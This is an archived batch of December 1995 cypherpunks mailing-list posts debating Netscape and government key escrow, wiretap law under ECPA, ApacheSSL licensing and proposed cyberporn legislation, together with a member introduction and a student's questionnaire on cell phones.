	I probably won't have much to say on this list.  Given the 
	volume of postings, and the relatively high signal to noise
	ratio (lots more politics than actual discussion of the 
	technology from what I've seen) I'll be very lucky if I can
	wade through all this on weekends.

	My name is Jim Dennis.  I'm a sysadmin (and webmaster, postmaster,
	and backup Netware supervisor) for a medium-sized software 
	publisher in the Bay Area.  I used to do tech support for 
	places like Quarterdeck and Symantec.  I've also done some 
	SQA.  Most of my experience is with DOS/Windows and PC's --
	but most of my recent work is on Linux, FreeBSD, SunOS and 
	Solaris.  I most frequently post answers to the *.lang.awk
	newsgroups (which I'm writing an FAQ for). 

	JaDeStar = Ja(mes) De(nnis) + Star(shine) [my girlfriend].
	There's an alias to this account: starshine@netcom.com
	which hits a procmail script and gets redirected to Heather's
	(Starshine's) current e-mail address at work.  This has been the 
	easiest way to ensure a continuity to her e-mail address
	from one employer to another.   She hardly ever logs into 
	this account otherwise.

	If you want to know more about me -- ask in e-mail (off the 
	list).




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Sun, 3 Dec 95 18:30:23 PST
To: Brian Davis <cypherpunks@toad.com
Subject: Evil Prosecutors on the List
Message-ID: <ace795de2a021004207c@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 1:30 AM 12/4/95, Brian Davis wrote:

>I feel slighted.  No one accused me of lacking principles because I
>haven't quit my job with the Justice Department based on its, and the
>Administration's, position.

Speaking for myself, I simply assumed you were a prosecutor handling the
"legitimate" cases, as the OJ prosecutors were (granted, different types of
cases). Despite my libertarian leanings, I suppose many or even most
prosecutions actually involve real crimes of fraud, theft, embezzlement,
etc., at least based on what I read of pending court cases. Though there
are probably a lot of "crimes" prosecuted that I don't think of as real
crimes.

A college friend of mine is married to a woman who's a prosecutor in
Brooklyn, and one of her cases involved prosecuting some poor shlub who was
caught committing the dastardly crime of _smuggling his own money_ out of
the country! (Tens of thousands of dollars, not the millions that a drug
case would involve, not that it matters to me, but it might to some.) My
point? I did not insult her when she mentioned this, just said something
like "Well, I don't view it as a crime." She of course understood, as her
husband is a libertarian like me.

(I could never be a prosecutor, or even a successful defense attorney, as I
would feel it necessary to decide on each case whether prosecution/defense
is justified.)

I suppose I don't impute evil to very many people at all. I view some
_institutions_ as counterproductive and at odds with the principles of free
association and non-aggression that this country was founded on, and it is
the _institutions_ I think need changing. Fortunately, strong crypto is the
right kind of tool at the right time. (I think my hero Tom Jefferson would
really have gotten a kick out of this stuff, especially considering that he
invented his own ciphers for private communication....not a lot of doubt
what he'd have thought about a scheme for the government to have access to
all business transactions, all conference calls, all private e-mail, and
all international letters.)

But I don't think of Dorothy Denning, for example, as an "evil" person,
just as someone whose assessment of the tradeoffs, and whose political
power of course (she having the ear of the leadership), is much different
from mine.

And I've met Stewart Baker, former chief counsel of the NSA (and
past/present advocate of restrictions on strong crypto use), and he's quite
knowledgeable and reasonable. (I hope readers will spare us the usual
responses along the lines of "They say Hitler was very charming." Monsters
can indeed be deceptively charming, but I don't think for a nanosecond that
Stewart Baker, Louis Freeh, Dorothy Denning, or Jim Clark fit into this
picture. My point is that reasonable people can have disagreements, even
disagreements which they cannot compromise about, without any requirement
that one or the other be "evil.")

Getting back to Baker, it is clear we disagree. He may even think me
irresponsible for advocating "anarcho-capitalist" views (*), but we were
able to communicate civilly at the last CFP and even shared a panel. I
think he understands my libertarian positions, and I think I understand his
concerns. As it happens, I'm just not convinced that stopping some number
of crimes is sufficient reward for outlawing privacy. Mounting cameras in
all homes and hotel rooms would undeniably stop some number of crimes, or
allow the perps to be caught and convicted, but it is too high a price to
pay by orders of magnitude.

(* I call my position "crypto anarchy," for reasons I've explained, but it
is actually the fairly well-respected position of laissez-faire capitalism,
aka anarcho-capitalism, aka freedom. Since it is instantiated on the Net,
perhaps a better name would be "arachno-capitalism," not to be confused
with the "narco-capitalism" practiced, it is said, by the CIA and various
dictators.)


>Nevertheless, I won't think less of Jeff if he doesn't quit.  He appears
>to be fighting what most here believe is the good fight.  Refusing to
>take his ball and go home does not mean, to me, that he lacks
>principles.  Perhaps it means that he thinks he can do more from within.
>
>Gee, and Tim May didn't get a new ISP when his current PC-ISP canceled
>his Usenet access because of his protected speech and then gave it back
>only if he included a disclaimer on his messages.  Fire away, Cypherpunks!!!

Indeed, we all make compromises.

The calls for Jeff to quit Netscape are especially pointless, I think.
First, he can do more for "our" cause than if he quits and his voice is no
longer heard. Second, it's far too early to know how things are going and
whether Netscape will in fact become the "munitions supplier" to the
Surveillance State. Third, the element of hypocrisy. I didn't see a single
one of our AT&T list members resign from AT&T over the Clipper flap.

This is why I'm concerned about the Netscape position, and why I'm probing
for details and explanations, but it is also why I'm trying the best I can
not to be rude or insulting to Jeff Weinstein. If we drive him off the list
with insults and cheap shots, it is quite possible that our views will no
longer have any impact within Netscape (or other companies, for that
matter) and that we'll just be dismissed as a bunch of crazies.

Your mileage may vary.

--Tim May

Views here are not the views of my Internet Service Provider or Government.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Brian Davis <bdavis@thepoint.net>
Date: Sun, 3 Dec 95 17:18:46 PST
To: Black Unicorn <unicorn@polaris.mindport.net>
Subject: Re: Netscape gives in to key escrow
In-Reply-To: <Pine.SUN.3.91.951202032514.18919C-100000@polaris.mindport.net>
Message-ID: <Pine.BSF.3.91.951203201237.6206F-100000@mercury.thepoint.net>
MIME-Version: 1.0
Content-Type: text/plain


On Sat, 2 Dec 1995, Black Unicorn wrote:

> On Fri, 1 Dec 1995, Brian Davis wrote:
> 
> > On Fri, 1 Dec 1995, Jonathan Zamick wrote:
> 
> > I disagree.  Almost nobody read the fine print on the back of a note you 
> > sign when you buy a car or otherwise take out a loan, but the provisions 
> > are generally enforceable ...  Ignorance is not necessarily an excuse.
> 
> Actually, I was under the impression that adherence contracts like that 

You are correct in saying that onerous provisions of adhesion contracts 
are sometimes not enforced against the party who did not draft the 
contract (the one who had it "forced" upon them).  Again, very fact 
specific.  And that has been my point all along.

As an aside, understand that my comments on this thread relate to my 
semi-educated prediction of how the law will be applied in this context.  
It does not reflect what the law would be if I were King of the forest.


> (the most oft touted example is the ski lift ticket with four paragraphs 
> on the back) are often tossed out when it has to do with liability on 
> that order.  The reason loan agreements are not often thrown out is 
> because courts find an increased expectation that the consumer would be 
> paying attention to the back of loan documents than the back of a ski 
> lift ticket.  I think it will be unlikely that warnings on the box of a 
> given piece of software will suffice.  Large banners in the program 
> itself may meet the threshold.         ^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Precisely.

> If there is enough interest, I will research the threshold issue.
> 
EBD




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Brian Davis <bdavis@thepoint.net>
Date: Sun, 3 Dec 95 17:21:40 PST
To: Black Unicorn <unicorn@polaris.mindport.net>
Subject: Re: GAK Flap Happening at a Good Time--Journalists Read!
In-Reply-To: <Pine.SUN.3.91.951202034905.18919D-100000-100000-100000@polaris.mindport.net>
Message-ID: <Pine.BSF.3.91.951203201900.6206G-100000@mercury.thepoint.net>
MIME-Version: 1.0
Content-Type: text/plain


On Sat, 2 Dec 1995, Black Unicorn wrote:

> On Fri, 1 Dec 1995, Jeff Weinstein wrote:
> 
> >   See my recent message to this list.  We will be taking an anti-GAK
> > position.
> 
> So you will refuse to implement GAK in future version of netscape then?  
> Or you will merely do lip service to the GAK policies at the conference?
>

Can you say "shareholders derivative suit"???
 
> I think the distinction is quite key.

Good one! 

> Forgive the pun.
> 
> > 	--Jeff
>  -- 

EBD




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr. Dimitri Vulis)
Date: Sun, 3 Dec 95 18:09:30 PST
To: cypherpunks@toad.com
Subject: Re: Globally legal Netscape
In-Reply-To: <9512032146.AA07279@all.net>
Message-ID: <ay0JFD12w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


fc@all.net (Dr. Frederick B. Cohen) writes:
> 	- The Russian revolution resulted in purges killing hundreds of
> 	thousands of innocent people because of their private, turned
> 	public, views as espoused in their private writings.

Correction: tens of millions were killed (including my great-grandfather).

> 	- The Soviet government took away personal privacy to keep their
> 	stranglehold on their people.

It's interesting to note that the democratic Russian government banned
all unlicenced cryptography this year. (I posted the translation of
Yeltsin's decree to this list).

 ...
> 	- The Germans under Hitler used personal records to identify and
> 	murder millions of Jews and other peoples.

One conspicuously absent example: the Roosevelt administration used the
census data (supposedly confidential) to ferret out persons of Japanese
descent, who were then sent to concentration camps.

---

Dr. Dimitri Vulis
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Brian Davis <bdavis@thepoint.net>
Date: Sun, 3 Dec 95 17:34:36 PST
To: Sten Drescher <dreschs@mpd.tandem.com>
Subject: Re: Netscape gives in to key escrow
In-Reply-To: <199512011629.KAA28071@galil.austnsc.tandem.com>
Message-ID: <Pine.BSF.3.91.951203202438.6206I-100000@mercury.thepoint.net>
MIME-Version: 1.0
Content-Type: text/plain


On Fri, 1 Dec 1995, Sten Drescher wrote:

> Matt Miszewski <crypto@midex.com> said:
> 
> MM> On Thu, 30 Nov 1995, sameer wrote:
> 
> s> Jeff: If Netscape comes out in favor of GAK, will you leave?  (Wait
> s> until February, at least, of course..) You don't have to answer that
> s> to me, or the list, just think about it, and answer it for yourself.
> s> Do you think "anyone else" there would leave, as you say below that
> s> they don't want to go down history, etc...
> 
> MM> While this would go over well in the press if handled right please
> MM> let everyone remember that Jeff is a real person with bills to pay
> MM> and food to put on at least his own table.
> 
> 	I believe that was the point: How many people at Netscape would
> put principled opposition to GAK ahead of expediency?  My guess?  Not
> enough.

I feel slighted.  No one accused me of lacking principles because I 
haven't quit my job with the Justice Department based on its, and the 
Administration's, position.

Then again, maybe you just realize that the market for lawyers, and the 
market for people who can actually do something worthwhile, is very 
different.

Nevertheless, I won't think less of Jeff if he doesn't quit.  He appears 
to be fighting what most here believe is the good fight.  Refusing to 
take his ball and go home does not mean, to me, that he lacks 
principles.  Perhaps it means that he thinks he can do more from within.

Gee, and Tim May didn't get a new ISP when his current PC-ISP canceled 
his Usenet access because of his protected speech and then gave it back 
only if he included a disclaimer on his messages.  Fire away, Cypherpunks!!!

EBD




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Sun, 3 Dec 95 19:20:55 PST
To: cypherpunks@toad.com
Subject: .SIG disclaimer, clarification
Message-ID: <ace7a27e2d02100417e2@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 3:55 AM 12/4/95, Timothy C. May wrote:
>At 1:30 AM 12/4/95, Brian Davis wrote:

>>Gee, and Tim May didn't get a new ISP when his current PC-ISP canceled
>>his Usenet access because of his protected speech and then gave it back
>>only if he included a disclaimer on his messages.  Fire away, Cypherpunks!!!
>
>Indeed, we all make compromises.

From Jay Campbell's post on this, I more carefully reread Brian's comment.
Without going into this in detail, which there is not enough time or
patience for anyone to read, I'll make a few clarifications.

1. I have not gotten a new ISP anytime recently.

2. I added a disclaimer to my .sig partly to lessen any future
misunderstandings about whether I was speaking for "tcmay@foobar.com" or
speaking for "foobar.com". And partly I added it--as should be clear from
"or the views of my government" part--as an ironic tweak.

3. The case involved a Usenet rant I wrote some time back in which my
"Organization:" field remained set at the default provided by the ISP
(complete with phone number for getting an account, as is common with
Netcom, AOL, Pipeline, etc.). People complained to the owner of
"foobar.com" claiming that his company could be sued, blah blah, for the
views I expressed. (I think this is absurd, of course, for so many reasons
I cannot begin to list them here.)

(I don't believe the nature of my rant is germane to the issues involved.
It was posted to a group filled with similar, or worse, rants, and was not
inappropriate to the subject of the newsgroup. And explaining the post in
context, including preceding and following posts, and other posts
circulating at the same time, would take far too much time while
accomplishing nothing productive. Was it extreme? Maybe. Events had pissed
me off, so I posted to a rant group. Unfortunately, some on the Usenet want
only their own rants heard.)

4. The owner of foobar.com abruptly turned-off my ability to access his
news machine and sent me an angry note demanding that I cancel my article,
post an apology, and make it clear in future posts that I was not with his
company (by changing the default Organization: field he had automatically
set!). He informed me that failure to promptly indicate my acceptance of
his conditions would result in my account being cancelled.

5. Being that I like the services at foobar.com, and being that it was a
minor matter to meet his conditions, I did so. My access to Usenet was
turned back on. This is what I meant by my statement "we all make
compromises."

6. I am very happy with "got.net," and Jay Campbell, one of the sysops of
got.net, was not the person involved above.

7. This issue presumably came to Brian's attention through the Cyberia
list, where someone (Chris Mohr) had commented on .sig disclaimers in
general and mine in particular. So I outlined the story, in even less
detail than I have here, as an interesting data point on how pressure can
be applied to stifle unpopular opinions.

(Understand that I am opposed to any laws which would force a sysop to keep
a customer he no longer wishes to have. My point is more sociological. In
particular, if a service or ISP gets the "reputation" for cancelling
accounts because of pressures applied, then those who want certain views
suppressed will know they can "roll" the ISP. Netcom, to their credit,
understood this early on and adopted a policy of never cancelling accounts
for the content of things said (spamming, fraud, chain letters, etc. being
well-described exceptions in their "Terms and Conditions"). Netcom has
several "despicable" posters who use the system to spread Jew-hating,
white-hating, gay-hating, men-hating, and other such *-hating views, and
even has Holocaust Deniers and the White Aryan Resistance as
account-holders. Netcom refuses to give in to those who want these accounts
cancelled. A lesson for all ISPs, and for remailers, too.)

--Tim May

Views here are not the views of my Internet Service Provider or Government.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Brian Davis <bdavis@thepoint.net>
Date: Sun, 3 Dec 95 17:53:27 PST
To: jim bell <jimbell@pacifier.com>
Subject: Re: "Got a subpoena?"
In-Reply-To: <m0tLwij-00090FC@pacifier.com>
Message-ID: <Pine.BSF.3.91.951203204048.6206J-100000@mercury.thepoint.net>
MIME-Version: 1.0
Content-Type: text/plain


On Sat, 2 Dec 1995, jim bell wrote:

> >On Thu, 30 Nov 1995, sameer wrote:
> >
> >> > 
> >> > What about a court order to (a) start comprehensive logging, and (b) not
> >> > tell anyone under penalty of ______ .
> >
> >I am unaware of any authority for such an order.
> >> 
> >> 	Aren't court orders part of the public record? I don't quite
> >
> >Yes, but court orders can be sealed pending further order of the court.
> 
> Okay, maybe with your qualifications you can answer this.  It has always
> mystified me why "the authorities" think they can engage in wiretapping
> without informing the person wiretapped that this has occurred, despite the
> fact that there was apparently never any precedent for this practice before
> the "wiretap era."

Because Congress passed the Electronic Communications Privacy Act which 
is codified, as amended, at 18 U.S.C. Section 2510 et seq.  Section 
2511(2)(a)(ii) states in part:  "Notwithstanding any other law, providers 
of wire or electronic communication service ... are authorized to provide 
information, facilities, or technical assistance to persons authorized by 
law to intercept wire, oral, or electronic communications ... if such 
provider ... has been provided with [a court order or a certification by 
an appropriate official that a court order isn't required ...]."

> 
> In addition, I would like to be able to figure out a method to allow the
> de-facto disclosure of such activities, and to in fact force the phone
> company to do so, if they are asked to tap my or anyone else's phone.  It
> occurred to me that even if there was a prohibition on explicitly revealing
> that such a tap exists, it should be possible to require the telephone
> company to certify that no tap exists, and to require that this
> certification will be followed by an explicit and immediate de-certification
> message the moment the phone company is unable to maintain such
> certification.  The receipt of such a letter/fax/email will indicate that a
> tap has been placed, despite the fact that it will not say so.

Sorry.  

In subsection B of the statute I quoted above, it states in 
part:  "No provider of wire or electronic communication service ... shall 
disclose the existence of any interception ... with respect to which the 
person has been furnished a court order or certification ... except as 
may be otherwise required by legal process and then only after prior 
notification to the Attorney General or ....  Any such disclosure shall 
render such person liable for the civil damages provided for in section 
2520.  No cause of action shall lie in any court against any 
provider ... for providing information ... in accordance with the terms 
of a court order or certification under this chapter." 

Thus providing evidence that one of the uses of lawyers is to [attempt 
to] close loopholes.

EBD

> 
> >EBD
> >
> >Not a lawyer on the Net, although I play one in real life.
> >
> 
> 

Not a lawyer on the Net, although I play one in real life.
**********************************************************
Flame away! I get treated worse in person every day!!





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Jeff Hupp" <jhupp@novellnet.gensys.com>
Date: Sun, 3 Dec 95 19:03:43 PST
To: cypherpunks@toad.com
Subject: Apachessl (was your mail)
Message-ID: <2B69E5170C1@Novellnet.Gensys.com>
MIME-Version: 1.0
Content-Type: text/plain


On  3 Dec 95 at 11:41, Laszlo Vecsey wrote:

: > > Competing with Netscape is obviously something that's easier said than
: > > done.  But we ought to consider the strategic importance of having robust,
: > 
: > 	I hate to repeat myself, but sometimes people don't listen.
: > http://www.c2.org/apachessl/
: 
: I don't see how you can charge for a commercial version of ApacheSSL. 
: Isn't it protected by the GNU license agreement? Or is the idea that by 
: registering ApacheSSL you still get the software for free but you are 
: required to pay for support.

	Go read the GNU license.  Nothing prevents selling the programs, 
nothing prevents selling modifications of the programs.  The major 
restraint is that you have to provide source.  Now, from what I read of 
the page, that is being done.

	Personally, I would prefer to see the whole thing given away, and if I
had done it, it would be.  But he (or his contractors / employees ) did
the work that went into modifying it, and if he wants to sell that
work he bloody well can.
-- 
JHupp@gensys.com           |For PGP Public Key:
http://gensys.com          |finger jhupp@gensys.com
Does history record any case in which the majority was right?





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: OpsAn@gnn.com (Michael Coates)
Date: Sun, 3 Dec 95 21:18:18 PST
To: cypherpunks@toad.com
Subject: Compromise on Cyberporn Legislation
Message-ID: <199512040518.AAA14508@mail-e1a.gnn.com>
MIME-Version: 1.0
Content-Type: text/plain


Just got this.  Maybe there is some common-sense surfacing.

COMPROMISE ON CYBERPORN LEGISLATION
The fears of online service providers and civil liberties advocates that new
federal telecommunications legislation would be too heavy-handed in its
effort to keep "filthy," "lewd" and "indecent" material off of the network
have been mitigated by compromise wording in the proposed legislation.  The
new language, offered by Washington State Republican congressman Rick White,
restricts penalties of fine or imprisonment to persons who transmit material
that is "harmful to children" (such as images of frontal nudity) rather than
a more broadly worded target against making "indecent material" available to
children.  The compromise would give legal protection to online information
and service providers who made good-faith efforts to keep restricted
material away from children.  (New York Times 2 Dec 95 A1)






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: fc@all.net (Dr. Frederick B. Cohen)
Date: Sun, 3 Dec 95 18:27:24 PST
To: cypherpunks@toad.com
Subject: more examples of privacy invasion as a prelude to oppresion desired
Message-ID: <9512040224.AA11723@all.net>
MIME-Version: 1.0
Content-Type: text


I think it would be a very good idea to collect a great deal more data
in support of the correlation between the reduction in privacy and the
removal of other rights - eventually resulting in bad things -
throughout history.  I would be happy to collect as much data as
possible on this from the cypherpunks (and others) and to post the
information in a more complete form when the examples start to slow
down.

The more facts and citations you can provide, the better it will be
for the purposes of making this point clear, accurate, and hard to
dispute.

-> See: Info-Sec Heaven at URL http://all.net/
Management Analytics - 216-686-0090 - PO Box 1480, Hudson, OH 44236



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@REPLAY.COM (Anonymous)
Date: Sun, 3 Dec 95 12:24:48 PST
To: cypherpunks@toad.com
Subject: Mr. Bubble II
Message-ID: <199512032025.VAA12833@utopia.hacktic.nl>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Tim May, 12/3/95, 2:22 PM :
 
>My thesis is that both Netscape and Microsoft are in positions at this time
>to either do the right thing (tm) or to help build in the tools for a
>police state, an Orwellian surveillance state.

      Gee, Tim, this is *your* thesis? 

>Netscape, being the dominant browser company, and Microsoft, being the
>dominant OS company, are in special positions to "build in Big Brother."
>I'm not claiming they are, just that they are clearly in a position to make
>it technologically more feasible to make non-GAK illegal. They both need to
>carefully think about the role that's been "given" to them (whether by
>fortune, hard work, or being in the right place at the right time) and do
>what's right.

      And?

>Strong words, perhaps, but the implications of mandatory key escrow are

      Not strong at all, actually.

>quite clear. We debated these points for a long time during the Clipper
>debate, and later when "Software Key Escrow" began to rear its head. I
>won't repeat these arguments against GAK here, but will take this
>opportunity to quote from a new book that actually quotes my words:

      [self-congratulations deleted]

>It is important that such companies as Netscape and Microsoft fully
>understand that crypto policy will largely determine civil liberties in
>this country and other countries for a long time to come. And they must
>understand that they can influence the direction. Bill Gates, after some
>early waffling, seems to now fully understand the implications of GAK and
>has written persuasively against it. Jim Clark does not seem to me to have
>thought about it as deeply, or perhaps has views of civil liberties which
>are not at odds with mandatory key escrow, the "open door policy" mentioned
>above.

      Like many entrepreneurs, he is an opportunist in every sense, good
and bad. He has yet to advance -- "graduate" maybe -- beyond that point.
NS's stance re GAK is a golden opportunity for Mr. Bubble either to
graduate or to get popped: either patted on the back by Papa State or
popped in the noggin. When "opportunity" is at stake, he's a shrewd
maneuverer; but when pitting his integrity against federal charges is at
stake, he's still a kid -- he doesn't see the opportunity in it.

>And time is of the essence. Things move very fast. It is no longer the case
>that a law is passed, then companies respond to the new legal regime with
>their own policies and products. Companies, especially in high tech, are
>"partners" from the start, as we saw with the Clipper development (where
>AT&T had known about Clipper for years prior to the first public
>announcement, and was cooperating in the development of it, not to mention
>the other companies such as Mykotronx, VLSI Technology, etc., which were
>involved in secret for years).

      Partner, schmartner: "partners" can be adversarial, and adversarial
relations can become *very* adversarial. Here's the question: is the dog
gonna wag the tail or vice versa? The USG has, as we all know,
demonstrated its infinite capacity to knuckle under in the face of
hardened opposition, whether announced or de facto. NS is in a privileged
position to drag the LEA establishment onto the mat, with the whole of the
American public watching. And it stands to gain from doing so, as do we
all.
      But Mr. Bubble wants to be friends, wants to receive genteel toasts.
      With the kind of money Mr. Bubble stands to make -- whether from NS
or from subsequent ventures -- he should be maybe just a bit tougher. If
he's looking for models, names like Carnegie and Bismarck come to
mind. (Note that their progeny *still* have money, not 2 years later but
*generations* later.)

>It is only sheer speculation on our part (some of us, at least) that
>negotiations about GAK have been going on with the major software
>companies. Jim Clark, for example, learned what he knows about key escrow
>_someplace_, and it probably wasn't from our list or from articles he'd
>read. I'm betting, but could of course be wrong, that he and other folks at
>Netscape (and I mustn't leave out Microsoft, Sun, SGI, Apple, etc.) have
>been briefed on key escrow and that various negotiations are already
>underway. This would match how things were done with Clipper, and would
>explain Clark's voiced support for the need for GAK.

      On the contrary, it is sheer speculation that negotiations about GAK
*haven't* been going on. This shit doesn't happen by magic.

>I hope Jeff W. and Jim C. can have some _long_ chats. The stakes are too
>high for product decisions to be made without full awareness of the
>implications. The statements from Jim Clark do tend to imply a kind of
>defeatism, and even Jeff's comments seemed laden with qualifications about
>"only if the government requires us to." As Hal Finney noted in his post,
>it's as if the Netscape people are preparing for the inevitable. Maybe it's
>not an indication that GAK is being considered within Netscape, but maybe
>it is. After all, one rarely hears "only if we have to" qualifications on
>things that are truly from out in left field.

      Yes.

>And what Netscape agrees to put in future releases of its browsers or its
>servers could have dramatic effects on the whole climate.

      Yes.


      [social darwinism deleted]

>Should Netscape play ball with the NSA or refuse to cooperate? I'm not
>suggesting that Netscape "break the law." Actually, there are *no* laws at
>present about GAK or about the use of strong crypto within the U.S., and
>most of us want to keep it that way. Thus, Jim Clark and Netscape could
>strongly lobby for keeping things the way they are, and could even say "If
>foreign governments demand GAK, let them build it in themselves--we will
>not produce the software to run a police state."

      NS should implement strong crypto, make it publicly available by FTP
and in a box, and see how the USG responds. The public is on its side.

>And if export laws demand GAK in exported products, Netscape should "do the
>right thing" and have two versions. It may add to their costs a little, but
>it's better than building in the machinery for a GAK law to later be
>passed.

      Yes.

>(Explain something to me. I have never, ever understood why it is a concern
>of the U.S. government that we help build in GAK for foreign governments,
>that we make sure that products intended for export to France or Syria have
>GAK that allows those governments to read the traffic of their citizens.
>And if the concern is that exported versions of software must be readable
>to the _United States_, then this is a non-starter in terms of sales in
>many or even most foreign countries! I'm sure France will welcome with open
>arms a version of Netscape that allows the NSA to read the traffic of
>French citizens. Oh, by the way, what legal jurisdictions will be involved
>in obtaining the escrowed keys of foreigners? The answers are both clear
>and murky, if you catch my drift.)

      Because it isn't interested in freedom, here or anywhere else. It is
interested in a "controlled burn" distribution of stability and
instability. Its willingness to do business with its "enemies" has been
amply demonstrated.
      But your drift is clear, and it is right.

>If the U.S. insists on GAK _within the U.S._, as many of us fear is the
>long-term danger, then all bets are off anyway. But I would hope that
>Netscape does nothing to make it _easier_ to make this the case!

      On the contrary: That's when bets are on. That's when *you* -- and
all of us -- might have to start putting our money and our homes in
Corralitos on the line. That's when Black Unicorn will upload the papers
he claims to have, when I will start wrapping PGP-encrypted mail in
pretty-looking wrappers. That's when we'll have no one but ourselves to
blame. Not even Netscape.

>A viable thing for Netscape to do is to announce forthrightly that it will
>separate the issue of export from what it sells in the U.S., that there
>will be NO GAK included in any U.S.-sold packages. The quest for an "all
>world" version, freely exportable, should not take precedence over the
>civil liberties issues. And I predict that any slight losses in market
>share or slight increases in product cost will be _less_ than the effects
>Netscape will see if their product comes to be associated with "Big Brother
>Inside."

      Yes. But NS should act first, explain second. If NS wants money,
that's how to get it.

>Enough for now.

      Yes.

Hieronymous.
-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQBVAwUBMMIHhr3g0mNE55u1AQFI3QH/Y32u8ASp61MPjkaeQJJly7qwQ5BuGNYx
XndZMAPBVXJjOr4Mx5BieouM5GG5WgBc1fMTTRrnAJtSHQO3dgwwBQ==
=WCJS
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dima@cuix.pscu.com
Date: Sun, 3 Dec 95 21:27:13 PST
To: cypherpunks@toad.com
Subject: No Subject
Message-ID: <TCPSMTP.15.12.3.-11.26.38.2241058206.1303264@cuix.pscu.com>
MIME-Version: 1.0
Content-Type: text/plain


|=========================Hello!=====================================|
| My name is Dmitriy Stepanchuk and I'm student of Kentridge HS.     |
| I have an assignment for school to interview with  an expert.      |
| My subject is Cellular Systems and how are they work.              |
| If you don't mind and are able to answer following question please |
| fill up the blanks, and I will appreciate that.                    |
|======================= Thank you!!! ===============================|

Please put your Name:
.....................................................................
---------------------------------------------------------------------
1)    What is a Cellular System?
.....................................................................
.....................................................................
.....................................................................
---------------------------------------------------------------------
2)    How long is the distance between each cell?
.....................................................................
---------------------------------------------------------------------
3)    What is the most important thing about using cell phones?
.....................................................................
.....................................................................
.....................................................................
.....................................................................
---------------------------------------------------------------------
4)    How do you program cell phones?  Can you program the phone to
      another channel?
.....................................................................
.....................................................................
.....................................................................
.....................................................................
---------------------------------------------------------------------
5)    What is the frequency of the cell phone?
.....................................................................
---------------------------------------------------------------------
6)    Is it possible to get on the same channel for two phones? Why?
.....................................................................
.....................................................................
.....................................................................
---------------------------------------------------------------------
7)    What percentage of the people in US are using cell phones?
.....................................................................
---------------------------------------------------------------------
8)    What is the output power for the portable phones?
.....................................................................
---------------------------------------------------------------------
9)    Is it possible to call toll-free numbers from cell phone?
.....................................................................
---------------------------------------------------------------------
10)   Will I be able to use my cell phone in other countries?
      If not why?
.....................................................................

----- Don't forget to use "message quoting" when you reply ----------
                     +++++++++++++++++++++++++++
               That's it!! Thank you very much!!!!!!!!!!!!!!!!






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Pat Farrell" <pfarrell@netcom.com>
Date: Sun, 3 Dec 95 18:28:27 PST
To: cypherpunks@toad.com
Subject: RE: Do the Right Thing
Message-ID: <77313.pfarrell@netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


TCMay writes to c'punks:

> Well, people discuss what they think is important. Those who don't think
> this topic is important are of course not compelled to participate in the
> debate.

True.
Although calling it a debate is being loose with terms. Rant is more
accurate.

> These two points are what many of us are concerned about. Some may argue
> "Wait until it's illegal, then protest," but I think the Cypherpunks list
> has shown a particular strength in spotting "early warning signals" well
> in advance of actual developments, thus enabling us to get our ducks in
> line and hit the ground running (to mix some metaphors).


Hey, I was a fan of Trial Balloon...
But let's react to reality, not net-rumours.

Nothing to date has indicated that domestic GAK will be mandatory,
except, as I noted in the last post, DERD, Freeh, and Grevildinger [sp]

We are failing to get our message across to the Joe Sixpacks
of the world. We are starting to get some coverage in
the press (USA Today, NY Times, etc.) but this is a slow
education effort.

Preaching to the choir is pretty pointless.

>>It was quite clearly implied at the September meetings that the
>>  Government expected that vendors would do only one version, GAK'd.
>>  This would allow the LEAs to tromple all over US civil liberties
>>  at will.
> This was my point about having a domestic and an export version.

Don't we agree on this? "tromping" on civil liberties sucks. That is
what I wrote last message.


> Pat, if the policies and technologies surrounding key escrow are not
> relevant to the themes of the Cypherpunks list, I surely don't know what
> is!

The policies and technologies are relevant. hacks to disable
Netscape because people are too lazy to see that they are
already doing multiple versions, or that others provide
browsers, is noise. IMHO.

If we want to find out about the policies, and given that there
is a huge, public meeting in two days, can't we wait to get some facts?




> People talk about what matters to them, for the most part, and attempts to
> "steer" the list to other topics are best done by example. That is, write
> up a really interesting article on some "relevant" topic and perhaps
> people will discuss it. That seems better than saying a discussion of GAK
> is not relevant.


I have not said any such thing. I have attempted to write up actual,
factual recordings of GAK at NIST.

What I am saying is that bitching about Netscape is a waste of list
bandwidth. If you think Netscape is full of fascists, use
another browser. Or, heaven forbid, write code.


> And the NIST/NSA meeting is coming up in a few days...what better time to
